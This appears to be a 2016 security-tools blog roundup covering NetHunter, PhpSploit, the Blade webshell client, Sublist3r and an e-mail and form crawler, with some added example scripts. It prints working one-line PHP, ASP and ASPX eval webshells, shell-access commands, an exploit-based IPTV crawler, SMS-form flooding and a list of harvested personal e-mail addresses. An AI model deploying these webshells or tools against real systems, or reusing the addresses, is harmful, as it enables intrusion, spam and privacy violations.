SECURITY EDUCATION, PRIVACY GUIDANCE, THREAT AWARENESS, OPEN SOURCE TOOLS, RESEARCH NOTES, AND RESPONSIBLE TECHNOLOGY CONTENT

  • Penetration Testing Distribution - BackBox

    BackBox is an Ubuntu-based Linux distribution oriented towards penetration testing and security assessment, providing a toolkit for network and information systems analysis. It includes a complete set of tools required for ethical hacking and security testing...
  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution built from Debian Squeeze. For the desktop environment it uses Fluxbox...
  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...
  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large number of cyber security tools. It is an open-source distro created specifically for penetration testers and security researchers...
  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud-friendly operating system designed for pentesting, computer forensics, reverse engineering, hacking, cloud pentesting...

Wednesday, January 6, 2016

Kali NetHunter 3.0 - Android Mobile Penetration Testing Platform



What’s New in Kali NetHunter 3.0


    NetHunter Android Application Rewrite


The NetHunter Android application has been totally redone and has become much more “application centric”. Many new features and attacks have been added, not to mention a whole bunch of community-driven bug fixes. The NetHunter application has finally reached maturity and is now a really viable tool that helps manage complex attacks. In addition, the application now allows you to manage your Kali chroot independently, including rebuilding and deleting the chroot as needed. You can also choose to install individual metapackages in your chroot, although the default selected kali-nethunter metapackage should include all the bare necessities.

    Android Lollipop and Marshmallow Support


Yes, you heard right. NetHunter now supports Marshmallow (Android AOSP 6.x) on applicable devices – although we’re not necessarily fans of the “latest is best” philosophy. Our favourite device continues to be the OnePlus One phone due to the combined benefits of size, CPU/RAM resources, as well as Y-Cable charging support.

    New Build Scripts, Easier Integration for New Devices


Our rewrite also covered the code that generates the images, porting it completely to Python and reducing the build time significantly. The build process can now produce small NetHunter images (~70MB) that do not include a built-in Kali chroot, allowing you to download a chroot later via the Android application.

We’ve also made it much easier to build ports for new devices that NetHunter can run on and we’ve already seen a couple of interesting PRs regarding Galaxy device support…


    Fabulous NetHunter Documentation


We might be somewhat biased regarding our documentation, and perhaps it’s not “fabulous” but just “good”… but still, it’s definitely much better than it was before and can be found in the form of the NetHunter Github Wiki. We’ve included topics such as downloading, building and installing NetHunter, as well as a quick overview of each of the NetHunter Attacks and Features.

    NetHunter Linux Root Toolkit Installer


We’ve got a new official NetHunter installer that runs natively on Linux or OS X. The installer is a set of Bash scripts which you can use to unlock, flash back to stock and install the NetHunter image on supported OnePlus One or Nexus devices. Please welcome the NetHunter LRT, created by jmingov.



ParanoicScan - Vulnerability Scanner



Old options

Google & Bing scanner that also scans for:

  • XSS
  • SQL GET / POST
  • SQL GET
  • SQL GET + Admin
  • Directory listing
  • MSSQL
  • Jet Database
  • Oracle
  • LFI
  • RFI
  • Full Source Disclosure
  • HTTP Information
  • SQLi Scanner
  • Bypass Admin
  • Exploit FSD Manager
  • Paths Finder
  • IP Locate
  • Crack MD5
  • Panel Finder
  • Console

Fixes

[+] Refresh of existing pages when cracking MD5
[+] Error in the FSD scanner
[+] HTTP error in the scanner
[+] Annoying spacing between text
[+] Added array for bypass
[+] Failed to read from file

New options

[+] Generate all logs in an HTML file
[+] Random and new user agents
[+] Multi encoder/decoder:

  • ASCII
  • Hex
  • URL
  • Bin to Text & Text to Bin
[+] Port scanner
[+] HTTP fingerprinting
[+] CSRF tool
[+] XSS scan
[+] XSS bypass generator
[+] TinyURL link generator
[+] Exploit finder and downloader for Exploit-DB
[+] MySQL manager
[+] LFI tools


IPTV Brute-Force - Search And Brute Force Illegal IPTV Server




This program is just a demonstration. DO NOT USE IT FOR PERSONAL PURPOSES.

What is this?

IPTV is a simple Python script that lets you crawl the search engines in order to find sites that stream illegal TV programs.

This script leverages the fact that a lot of those sites use the same CMS to build the web application and share the service, and behind a CMS there are always some exploits. We are using one simple exploit to grab and crawl the site's URL and use it for our purpose.

Ethical Dilemma

Even though those services are illegal, stealing from a thief is still stealing.

External dependencies

If you want to use the iptv_gui version you need to install PyQt first:
  • On Linux you can simply search for it in your preferred package manager; for example, on Ubuntu/Debian: sudo apt-get install pyqt4-dev-tools
  • On Mac OS X you can use brew to install it: brew install sip && brew install pyqt
  • On Windows you can download the official .exe from the PyQt site.

How to use the CLI version
  • Clone the repository git clone https://github.com/Pinperepette/IPTV
  • cd into the iptv directory
  • run pip install -r requirements.txt in order to get the full dependencies
  • run python iptv_cli.py
  • Use the application menu to do stuff

How to use the GUI version
  • Clone the repository git clone git@github.com:Pinperepette/IPTV.git
  • cd into the iptv directory
  • run pip install -r requirements.txt in order to get the full dependencies
  • run python iptv_gui.py


Compatibility

This program works on Windows, Linux, Mac OS X and BSD. The only requirement is Python, preferably Python 3.



Sawef - Send Attack Web Forms




DESCRIPTION
The purpose of this tool is to be a Swiss army knife
for anyone who works with HTTP. So far it is basic,
offering only a few of the features we want it to have,
but the tool already provides:

- Email Crawler in sites
- Crawler forms on the page
- Crawler links on web pages
- Sending POST and GET
- Support for USER-AGENT
- Support for THREADS
- Support for COOKIES


REQUIREMENTS
 ----------------------------------------------------------
Imports:
threading
time
argparse
requests
json
re
BeautifulSoup

Permissions: read & write
User: root privileges, or membership of the sudoers group
Operating system: Linux
Python 2.7
----------------------------------------------------------

INSTALL
git clone http://github.com/danilovazb/SAWEF

sudo apt-get install python-bs4 python-requests


HELP
usage: tool [-h] --url http://url.com/
[--user_agent '{"User-agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; hu-HU; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"}']
[--threads 10] [--data '{"data":"value", "data1":"value"}']
[--qtd 5] [--method post|get]
[--referer '{"referer": "http://url.com"}']
[--response status_code|headers|encoding|html|form|links|emails]
[--cookies '{"__utmz":"176859643.1432554849.1.1.utmcsr=direct|utmccn=direct|utmcmd=none"}']
[--modulo crawler]

optional arguments:
-h, --help show this help message and exit
--url http://url.com/
URL to request
--user_agent '{"User-agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; hu-HU; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"}'
For a longer list, visit:
http://www.useragentstring.com/pages/useragentstring.php
--threads 10 Number of threads
--data '{"data":"value", "data1":"value"}'
Data to be transmitted by POST
--qtd 5 Number of requests
--method post|get
Method used to send requests
--referer '{"referer": "http://url.com"}'
Referer
--response status_code|headers|encoding|html|form|links|emails
What to return
--cookies '{"__utmz":"176859643.1432554849.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)"}'
Cookies for the site
--modulo crawler Loads an additional module



EXAMPLE
*Send one anonymous SMS via POST [Brazilian service]:
-------------
$:> python sawef.py --url "https://smsgenial.com.br/forms_teste/enviar.php" --data '{"celular":"(11) XXXX-XXXXX","mensagem":"Teste","Testar":"Enviar"}' --threads 10 --qtd 1 --user_agent '{"User-agent":"Mozilla/5.0 (Windows; U; Windows NT 5.1; hu-HU; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"}'

*List Form attributes:
-------------
$:> python sawef.py --url "https://smsgenial.com.br/" --method post --response form
OUTPUT:

--------------------------------
NOME_FORM[None]
URL[http://paineldeenvios.com/painel/app/login/login.php]
METHOD[post]

email:Digite Seu Login (text)
passwd:Senha (password)
Entrar:Entrar (submit)

--------------------------------
NOME_FORM[form1]
URL[/forms_teste/criaruser.php]
METHOD[post]

action:criarconta (hidden)
nome:<NONE> (text)
celular:<NONE> (text)
email:<NONE> (text)
Testar:Criar (submit)
Testar:Enviar (hidden)

--------------------------------
NOME_FORM[None]
URL[/forms_teste/enviar.php]
METHOD[post]

celular:<NONE> (text)
Testar:Enviar (submit)

* Get emails from web pages
$:> python sawef.py --url "http://pastebin.com/ajaYnLYc" --response emails
[...]
[+] EMAIL = manothradevi@yahoo.com
[+] EMAIL = fantaghiroaziera@yahoo.com
[+] EMAIL = naqibjohari@yahoo.com
[+] EMAIL = azliey3036@yahoo.com
[+] EMAIL = azlin_4531@yahoo.com.my
[+] EMAIL = urshawal96@yahoo.com
[+] EMAIL = weeta_aida88@yahoo.com.my
FOUND = 3065

* Get links on web pages
$:> python sawef.py --url "http://terra.com.br" --response links
[...]
[+] LINK = http://uol.com.br/https://pagseguro.uol.com.br/vender
[+] LINK = http://www.uolhost.com.br/registro-de-dominio.html
[+] LINK = http://noticias.uol.com.br/arquivohome/
[+] LINK = http://noticias.uol.com.br/erratas/
[+] LINK = http://uol.com.br/#
[+] FOUND = 360

* Crawling site

$:> python sawef.py --url "http://www.100security.com.br" --modulo "crawler"
Emails:

[+] marcos@aulasdeti.com.br
[+] marcos@100security.com.br
[+] danilovazb@gmail.com
[+] cve@mitre.org
[+] cve-id-change@mitre.org
[+] devon@digitalsanctuary.com
[+] g5382139@trbvm.com
[+] editor@www.com
[+] support@senderbase.org
[+] 0x0ptim0us@gmail.com
[+] ramiro.caire@gmail.com
[+] fgmassa@vanguardsec.com
[+] crime.internet@dpf.gov.br
[+] cgpre@dpf.gov.br
[+] dpat.dcor@dpf.gov.br
[+] dicof.cgcsp@dpf.gov.br
[+] coain.coger@dpf.gov.br
[+] dprev.cgpfaz@dpf.gov.br
[+] dicat@pcdf.df.gov.br
[+] nureccel@pc.es.gov.br
[+] devir@pc.ms.gov.br
[+] comunicacao@policiacivil.pa.gov.br
[+] cibercrimes@pc.pr.gov.br
[+] policiac@fisepe.pe.gov.br
[+] drci@policiacivil.rj.gov.br
[+] drci@pcerj.rj.gov.br
[+] drci@pc.rs.gov.br
[+] 4dp.dig.deic@policiacivil.sp.gov.br
[+] marcos@marcoshenrique.com
[+] contato@fabricadeaplicativos.com.br
[+] email@mail.com.br
[+] lcm@lcm.com.br
[+] luizwt at gmail.com
[+] luizwt@gmail.com
[+] geoff@deconcept.com
[+] revista@espiritolivre.org
[+] email@email.com
[+] s**********s@gmail.com
[+] //iriok@hotmail.com
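The two outputs above (the form listing and the e-mail list) come from parsing the fetched HTML. As an added example, not SAWEF's own code, the following script reproduces both with only the Python standard library (html.parser in place of BeautifulSoup). The HTML page it parses is constructed inline to mirror the login and registration forms shown above; the payload_template() helper turns a parsed form into the dictionary you would pass to --data, with hidden and submit values pre-filled because the server usually checks them.

```python
"""Form and e-mail extraction in the style of SAWEF's --response form/emails.

Added example using only the standard library; not SAWEF's own code.
SAMPLE_HTML is constructed for the demo (nothing is fetched).
"""
import re
from html.parser import HTMLParser

# Constructed sample page mirroring the forms in the output above.
SAMPLE_HTML = """
<html><body>
<form action="http://paineldeenvios.com/painel/app/login/login.php" method="post">
  <input type="text" name="email" placeholder="Digite Seu Login">
  <input type="password" name="passwd" placeholder="Senha">
  <input type="submit" name="Entrar" value="Entrar">
</form>
<form name="form1" action="/forms_teste/criaruser.php" method="POST">
  <input type="hidden" name="action" value="criarconta">
  <input type="text" name="nome">
  <input type="text" name="celular">
  <input type="submit" name="Testar" value="Criar">
</form>
<p>Contato: <a href="mailto:suporte@example.com">suporte@example.com</a>,
   vendas@example.com.br ou SUPORTE@example.com</p>
</body></html>
"""

# Good-enough address pattern for recon (not a full RFC 5322 parser).
EMAIL_RE = re.compile(
    r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}")


class FormCollector(HTMLParser):
    """Collects every <form> with its name, action, method and input fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "name": a.get("name"),
                "action": a.get("action"),
                "method": (a.get("method") or "get").lower(),
                "fields": [],
            }
            self.forms.append(self._current)
        elif tag in ("input", "textarea", "select") and self._current is not None:
            # Label shown to the user: placeholder, else the value, else <NONE>.
            label = a.get("placeholder") or a.get("value") or "<NONE>"
            ftype = (a.get("type") or "text") if tag == "input" else tag
            self._current["fields"].append((a.get("name"), label, ftype))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def extract_forms(html):
    """Return the list of parsed forms found in `html`."""
    collector = FormCollector()
    collector.feed(html)
    return collector.forms


def render(form):
    """Print a form in the NOME_FORM / URL / METHOD layout used above."""
    lines = [f"NOME_FORM[{form['name']}]", f"URL[{form['action']}]",
             f"METHOD[{form['method']}]", ""]
    lines += [f"{name}:{label} ({ftype})" for name, label, ftype in form["fields"]]
    return "\n".join(lines)


def payload_template(form):
    """Dict ready for --data: hidden and submit values are copied from the
    page, user-supplied fields are left empty for the operator to fill."""
    return {name: (label if ftype in ("hidden", "submit") else "")
            for name, label, ftype in form["fields"] if name}


def extract_emails(html):
    """Unique, lower-cased addresses found anywhere in the markup."""
    return sorted({m.lower() for m in EMAIL_RE.findall(html)})


if __name__ == "__main__":
    for form in extract_forms(SAMPLE_HTML):
        print("-" * 32)
        print(render(form))
        print("--data", payload_template(form))
    for address in extract_emails(SAMPLE_HTML):
        print("[+] EMAIL =", address)
```

Run it as a script to see the same layout as the tool's output. Note that the href in a mailto: link and the visible text produce the same address, so the e-mail extractor de-duplicates before reporting a count, which the FOUND totals above would otherwise inflate.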




Vuvuzela - Private Messaging System That Hides Metadata


Vuvuzela is a messaging system that protects the privacy of message contents and message metadata. Users communicating through Vuvuzela do not reveal who they are talking to, even in the presence of powerful nation-state adversaries. Our SOSP 2015 paper explains the system, its threat model, performance, limitations, and more. Our SOSP 2015 slides give a more graphical overview of the system. 

Vuvuzela is the first system that provides strong metadata privacy while scaling to millions of users. Previous systems that hide metadata using Tor (such as Pond) are prone to traffic analysis attacks. Systems that encrypt metadata using techniques like DC-nets and PIR don't scale beyond thousands of users.

Vuvuzela uses efficient cryptography (NaCl) to hide as much metadata as possible and adds noise to metadata that can't be encrypted efficiently. This approach provides less privacy than encrypting all of the metadata, but it enables Vuvuzela to support millions of users. Nonetheless, Vuvuzela adds enough noise to thwart adversaries like the NSA and guarantees differential privacy for users' metadata.

Screenshots

A conversation in the Vuvuzela client

In practice, the message latency would be around 20s to 40s, depending on security parameters and the number of users connected to the system.

Noise generated by the Vuvuzela servers

Vuvuzela is unable to encrypt two kinds of metadata: the number of idle users (connected users without a conversation partner) and the number of active users (users engaged in a conversation). Without noise, a sophisticated adversary could use this metadata to learn who is talking to who. However, the Vuvuzela servers generate noise that perturbs this metadata so that it is difficult to exploit.
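The idea behind that noise can be checked numerically. The following is an added illustration, not Vuvuzela's code: Vuvuzela's servers use their own noise distribution and parameters, while here the standard Laplace mechanism stands in for it. A counter (idle or active users) that moves by at most a small constant when one conversation starts or ends, published with Laplace noise of scale b, gives the adversary at most a factor of exp(Δ/b) of evidence for one true count over a neighbouring one. The noise mean, the clipping at zero and the user numbers below are demo assumptions.

```python
"""Why noise on the idle/active counters hides who started talking.

Added illustration, not Vuvuzela's code: the standard Laplace mechanism
stands in for the servers' real noise distribution and parameters.
"""
import math
import random


def laplace_pdf(x, mean, scale):
    """Density of Laplace(mean, scale) at x."""
    return math.exp(-abs(x - mean) / scale) / (2.0 * scale)


def laplace_sample(mean, scale, rng):
    """Draw from Laplace(mean, scale) by inverting the CDF."""
    while True:
        u = rng.random() - 0.5
        if abs(u) < 0.5:          # rng.random() can return exactly 0.0
            break
    return mean - scale * math.copysign(1.0, u) * math.log(1.0 - 2.0 * abs(u))


def epsilon(sensitivity, scale):
    """Laplace mechanism: a counter that changes by at most `sensitivity`
    when one conversation starts or ends, plus Laplace(scale) noise,
    is eps-differentially private with eps = sensitivity / scale."""
    return sensitivity / scale


def privacy_bound(sensitivity, scale):
    """exp(eps): the most any observation can favour one true count over
    a neighbouring one."""
    return math.exp(epsilon(sensitivity, scale))


def max_likelihood_ratio(count_a, count_b, scale, lo, hi, step=0.01):
    """Adversary's best case: over every observable value x in [lo, hi],
    how much more likely is x when the true count is count_a rather than
    count_b (or the other way round)?"""
    worst = 0.0
    for i in range(int((hi - lo) / step) + 1):
        x = lo + i * step
        pa = laplace_pdf(x, count_a, scale)
        pb = laplace_pdf(x, count_b, scale)
        worst = max(worst, pa / pb, pb / pa)
    return worst


def publish_counts(idle_users, active_users, noise_mean, scale, rng):
    """What one round reveals: each true counter plus fake accesses.
    Demo assumption: fake traffic is Laplace(noise_mean, scale) rounded to
    a non-negative integer, since a server cannot add negative dead-drop
    accesses. noise_mean must be large relative to scale so that clipping
    at zero is rare; otherwise the bound above no longer holds exactly."""
    def fake():
        return max(0, round(laplace_sample(noise_mean, scale, rng)))
    return idle_users + fake(), active_users + fake()


def demo_round(seed=7):
    """Deterministic round: 1000 idle and 500 active users (assumed),
    noise mean 300, scale 10."""
    return publish_counts(1000, 500, noise_mean=300.0, scale=10.0,
                          rng=random.Random(seed))


if __name__ == "__main__":
    # Two users starting a conversation moves the idle counter by 2.
    print("eps =", epsilon(2, 10.0), "bound =", privacy_bound(2, 10.0))
    print("observed ratio =", max_likelihood_ratio(100, 102, 10.0, 50.0, 150.0))
    print("published (idle, active) =", demo_round())
```

The likelihood-ratio scan shows that no observed value distinguishes "100 idle users" from "102 idle users" by more than exp(0.2), whatever the adversary sees in that round; lowering the scale tightens the noise but raises eps, which is the trade-off the paper's security parameters set, and it is also why the latency above grows with them.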

Usage
Follow these steps to run the Vuvuzela system locally using the provided sample configs.
  1. Install Vuvuzela (assuming GOPATH=~/go , requires Go 1.4 or later):
    $ go get github.com/davidlazar/vuvuzela/...
    The remaining steps assume PATH contains ~/go/bin and that the current working directory is ~/go/src/github.com/davidlazar/vuvuzela .
  2. Start the last Vuvuzela server:
    $ vuvuzela-server -conf confs/local-last.conf
  3. Start the middle server (in a new shell):
    $ vuvuzela-server -conf confs/local-middle.conf
  4. Start the first server (in a new shell):
    $ vuvuzela-server -conf confs/local-first.conf
  5. Start the entry server (in a new shell):
    $ vuvuzela-entry-server -wait 1s
  6. Run the Vuvuzela client:
    $ vuvuzela-client -conf confs/alice.conf
The client supports these commands:
  • /dial <user> to dial another user
  • /talk <user> to start a conversation
  • /talk <yourself> to end a conversation

Deployment considerations
This Vuvuzela implementation is not ready for wide-use deployment. In particular, we haven't yet implemented these crucial components:
  • Public Key Infrastructure: Vuvuzela assumes the existence of a PKI in which users can privately learn each other's public keys. This implementation uses pki.conf as a placeholder until we integrate a real PKI.
  • CDN to distribute dialing dead drops: Vuvuzela's dialing protocol (used to initiate conversations) uses a lot of server bandwidth. To make dialing practical, Vuvuzela should use a CDN or BitTorrent to distribute the dialing dead drops.
There is a lot more interesting work to do. See the issue tracker for more information.



Phpsploit - Stealth Post-Exploitation Framework



PhpSploit is a remote control framework, aiming to provide a stealthy interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable of maintaining access to a compromised web server for privilege escalation purposes.

Overview

The obfuscated communication is carried in HTTP headers of otherwise standard client requests and in the web server's corresponding responses, tunneled through a tiny polymorphic backdoor:
<? @eval($_SERVER['HTTP_PHPSPL01T']) ?>

Features

  • Efficient : More than 20 plugins to automate post-exploitation tasks
    • Run commands and browse filesystem, bypassing PHP security restrictions
    • Upload/Download files between client and target
    • Edit remote files through local text editor
    • Run SQL console on target system
    • Spawn reverse TCP shells
  • Stealth : The framework is made by paranoids, for paranoids
    • Nearly invisible by log analysis and NIDS signature detection
    • Safe-mode and common PHP security restrictions bypass
    • Communications are hidden in HTTP Headers
    • Loaded payloads are obfuscated to bypass NIDS
    • http/https/socks4/socks5 Proxy support
  • Convenient : A robust interface with many crucial features
    • Cross-platform on both the client and the server.
    • Powerful interface with completion and multi-command support
    • Session saving/loading feature, with persistent history
    • Multi-request support for large payloads (such as uploads)
    • Provides a powerful, highly configurable settings engine
    • Each setting, such as user-agent has a polymorphic mode
    • Customisable environment variables for plugin interaction
    • Provides a complete plugin development API

Supported platforms

  • GNU/Linux
  • Mac OS X
  • Windows (experimental)



Blade - A Webshell Connection Tool With Customized WAF Bypass Payloads



Blade is a console-based webshell connection tool, currently under development, which aims to be a replacement for Chopper (中国菜刀, China Chopper). Chopper is a very handy webshell client supporting a wide variety of server-side scripts, but it only runs on Windows, which is the motivation for creating another "Chopper" that supports Windows, Linux and Mac OS X. Blade is written in Python, so users can modify the webshell connection payloads and let Blade bypass some specific WAFs that Chopper cannot.

Major functions
Manage a web server with only one line of code on it, such as: <?php @eval($_REQUEST["cmd"]); ?>
PHP, ASP, ASPX & JSP supported.
Terminal console provided.
File management & database management.

Features
Cross-platform (Python needed)
Customizable WAF bypass payloads
Compatible with Chopper's server-side scripts

Server side scripts examples
PHP:<?php @eval($_REQUEST["cmd"]); ?>
ASP: <%eval request("cmd")%>
ASPX:<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>
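The PhpSploit backdoor quoted earlier (<? @eval($_SERVER['HTTP_PHPSPL01T']) ?>) and the three Blade/Chopper stubs above share one shape: a script whose only job is to hand request-controlled input to eval. That makes them easy to find on disk even when the traffic is hard to see in logs. The scanner below is an added example, not code from PhpSploit or Blade; the sample files are constructed here and contain exactly the stubs quoted on this page plus two benign files. The header_to_server_key() helper shows how PHP exposes a custom request header such as PHPSPL01T, which is why a request carrying the payload looks like an ordinary GET in an access log that records only the request line, referer and user agent.

```python
"""On-disk detection of one-line webshells of the kind Blade and PhpSploit
talk to. Added example, not part of either project. SAMPLE_FILES is
constructed; the shell bodies are the ones quoted on this page.
"""
import re

# Each signature: (label, pattern). Order matters only for the label chosen.
SIGNATURES = [
    ("php: eval() fed directly from a request superglobal",
     re.compile(r"\beval\s*\(\s*\$_(?:REQUEST|POST|GET|COOKIE|SERVER)\b", re.I)),
    ("php: command/code execution fed from a request superglobal",
     re.compile(r"\b(?:assert|system|passthru|shell_exec|exec|popen|create_function)"
                r"\s*\(\s*\$_(?:REQUEST|POST|GET|COOKIE|SERVER)\b", re.I)),
    ("asp: eval of request() input",
     re.compile(r"\beval\s+request\s*\(", re.I)),
    ("aspx: JScript eval of Request input with the 'unsafe' flag",
     re.compile(r"\beval\s*\(\s*Request\.(?:Item|Form|QueryString|Params)\b"
                r"[^)]*[\"']unsafe[\"']", re.I)),
]

# Constructed webroot: the four stubs from this page and two harmless files.
SAMPLE_FILES = {
    "uploads/shell.php": '<?php @eval($_REQUEST["cmd"]); ?>',
    "images/.cache.php": "<? @eval($_SERVER['HTTP_PHPSPL01T']) ?>",
    "old/shell.asp": '<%eval request("cmd")%>',
    "old/shell.aspx": '<%@ Page Language="Jscript"%>'
                      '<%eval(Request.Item["cmd"],"unsafe");%>',
    "app/search.php": '<?php $q = htmlspecialchars($_REQUEST["q"]); '
                      'echo "Results for $q"; ?>',
    "app/util.js": "const total = items.reduce((a, b) => a + b, 0);",
}


def scan(files):
    """Return (path, label) for every file matching a signature."""
    hits = []
    for path, body in files.items():
        for label, pattern in SIGNATURES:
            if pattern.search(body):
                hits.append((path, label))
                break   # one verdict per file is enough
    return hits


def header_to_server_key(header_name):
    """PHP's naming of a request header inside $_SERVER: the PhpSploit
    header 'PHPSPL01T: <code>' is read back as $_SERVER['HTTP_PHPSPL01T']."""
    return "HTTP_" + header_name.strip().upper().replace("-", "_")


if __name__ == "__main__":
    for path, label in scan(SAMPLE_FILES):
        print(f"[!] {path}: {label}")
    print(header_to_server_key("PHPSPL01T"))
```

These patterns catch the plain stubs, which is what both tools drop by default; a stub that rebuilds "eval" from chr() calls or base64_decode() needs a detector that watches execution (auditd/PHP function hooks) rather than file contents, and the PhpSploit payloads themselves never touch disk.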

Usage
Get a shell:
python blade.py -u http://localhost/shell.php -s php -p cmd --shell
Download a file:
python blade.py -u http://localhost/shell.php -s php -p cmd --pull remote_path local_path
Upload a file:
python blade.py -u http://localhost/shell.php -s php -p cmd --push local_path remote_path

Current issues
Server-side script support is incomplete; currently only PHP and ASP work.
Database management is not implemented yet, so databases cannot be connected to.



Sublist3R - Fast Subdomains Enumeration Tool For Penetration Testers



Sublist3r is a Python tool designed to enumerate subdomains of websites using search engines. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r currently supports the following search engines: Google, Yahoo, Bing, Baidu, and Ask. More search engines may be added in the future. Sublist3r also gathers subdomains using Netcraft and DNSdumpster.

subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.
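Both sources above produce raw material that needs cleaning before it is useful: search engines return URLs in mixed case, with ports, user info and look-alike domains, while a wordlist brute force returns a hit for every guess if the zone has a wildcard record. As an added example, not Sublist3r's or subbrute's code, the script below normalises scraped results, keeps only hosts strictly under the target, guards the brute-force step with a random-label wildcard check, and merges the two lists the way the -b switch does. The search results and DNS answers are constructed for the demo; a real run would scrape and resolve over the network.

```python
"""Turning search-engine hits and a wordlist into a clean subdomain list.

Added example, not Sublist3r's or subbrute's code. SAMPLE_RESULTS and the
DNS answers are constructed for the demo.
"""
import random
import string
from urllib.parse import urlsplit

# Constructed: what a scraper might collect for site:example.com queries.
SAMPLE_RESULTS = [
    "https://mail.example.com/owa/",
    "http://EXAMPLE.COM/",                    # apex domain, not a subdomain
    "https://www.example.com:8443/login",     # port must be stripped
    "api.example.com.",                       # trailing dot, no scheme
    "http://user:pw@mail.example.com/",       # duplicate, with userinfo
    "https://example.com.evil.net/phish",     # look-alike, unrelated zone
    "https://notexample.com/",                # suffix match without the dot
]

# Constructed DNS answers for the brute-force part.
FAKE_DNS = {"dev.example.com": "203.0.113.10", "mail.example.com": "203.0.113.25"}


def fake_resolve(host):
    """Stands in for a DNS lookup: an IP string, or None for NXDOMAIN."""
    return FAKE_DNS.get(host)


def wildcard_resolve(host):
    """A zone where *.wild.test answers for every label."""
    return "203.0.113.99" if host.endswith(".wild.test") else None


def hostname_from(item):
    """Normalised hostname from a URL or bare host string."""
    item = item.strip()
    if "://" not in item:
        item = "//" + item                 # make urlsplit treat it as a netloc
    host = urlsplit(item).hostname         # lower-cased; port and userinfo removed
    return host.rstrip(".") if host else None


def subdomains_from_results(domain, results):
    """Keep hosts strictly below `domain`; drop the apex and look-alikes."""
    domain = domain.lower().rstrip(".")
    found = set()
    for item in results:
        host = hostname_from(item)
        if host and host.endswith("." + domain):
            found.add(host)
    return sorted(found)


def has_wildcard(domain, resolve, rng=None):
    """If a random 12-letter label resolves, every guess would 'exist'."""
    rng = rng or random.Random()
    label = "".join(rng.choice(string.ascii_lowercase) for _ in range(12))
    return resolve(f"{label}.{domain}") is not None


def brute_force(domain, wordlist, resolve):
    """subbrute-style guessing from a wordlist, guarded against wildcard DNS."""
    if has_wildcard(domain, resolve):
        return []                          # results would be pure noise
    return sorted(f"{word}.{domain}" for word in wordlist
                  if resolve(f"{word}.{domain}") is not None)


def enumerate_all(domain, results, wordlist, resolve):
    """Merge both sources, as sublist3r -b does."""
    return sorted(set(subdomains_from_results(domain, results))
                  | set(brute_force(domain, wordlist, resolve)))


if __name__ == "__main__":
    for host in enumerate_all("example.com", SAMPLE_RESULTS,
                              ["dev", "mail", "nope"], fake_resolve):
        print(host)
```

To use it against a live target, replace fake_resolve with a function that wraps dns.resolver (the dnspython dependency listed below) and returns None on NXDOMAIN; the wildcard check then saves you from a wordlist's worth of false positives.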

Installation
git clone https://github.com/aboul3la/Sublist3r.git

Recommended Python version:
The recommended Python version is 2.7.x on any platform.
Other Python versions may not be supported at the moment.

Dependencies:

Requests library ( http://docs.python-requests.org/en/latest/ )
  • Install for Ubuntu/Debian:
sudo apt-get install python-requests
  • Install for Centos/Redhat:
sudo yum install python-requests
  • Install using pip:
sudo pip install requests

dnspython library ( http://www.dnspython.org/ )
  • Install for Ubuntu/Debian:
sudo apt-get install python-dnspython
  • Install using pip:
sudo pip install dnspython

argparse library
  • Install for Ubuntu/Debian:
sudo apt-get install python-argparse
  • Install for Centos/Redhat:
sudo yum install python-argparse
  • Install using pip:
sudo pip install argparse

Usage
Short Form   Long Form      Description
-d           --domain       Domain name to enumerate subdomains of
-b           --bruteforce   Enable the subbrute bruteforce module
-v           --verbose      Enable verbosity and display results in real time
-t           --threads      Number of threads to use for subbrute bruteforce
-o           --output       Save the results to a text file
-h           --help         Show the help message and exit

Examples
  • To list all the basic options and switches use -h switch:
python sublist3r.py -h
  • To enumerate subdomains of specific domain:
python sublist3r.py -d example.com
  • To enumerate subdomains of specific domain and show results in realtime:
python sublist3r.py -v -d example.com
  • To enumerate subdomains and use the subbrute bruteforce module:
python sublist3r.py -b -d example.com



Nipe - Script To Redirect All Traffic From The Machine To The Tor Network


Script to redirect all the traffic from the machine to the Tor network.
[+] AUTHOR:   Vinicius Gouvea
[+] EMAIL:    vini@inploit.com
[+] BLOG:     https://medium.com/viniciusgouvea
[+] GITHUB:   https://github.com/HeitorG
[+] FACEBOOK: https://fb.com/viniciushgouvea



Installing:
git clone https://github.com/HeitorG/nipe
cd nipe
cpan install strict warnings Switch

Commands:
COMMAND   FUNCTION
install   Install
start     Start
stop      Stop


Tested on:
  • Ubuntu 14.10 and 15.04
  • BunsenLabs Hydrogen
  • Debian Jessie 8.1 and Wheezy 7.9
  • Lubuntu 15.04
  • Xubuntu 15.04
  • LionSec 3.0

Established in 2015. Offensive Sec Blog has been sharing security research, hacking tools, threat intelligence, and offensive security content since 2015.
Copyright © OffSec Blog | Powered by OffensiveSec
Design by OffSec | Built for the security community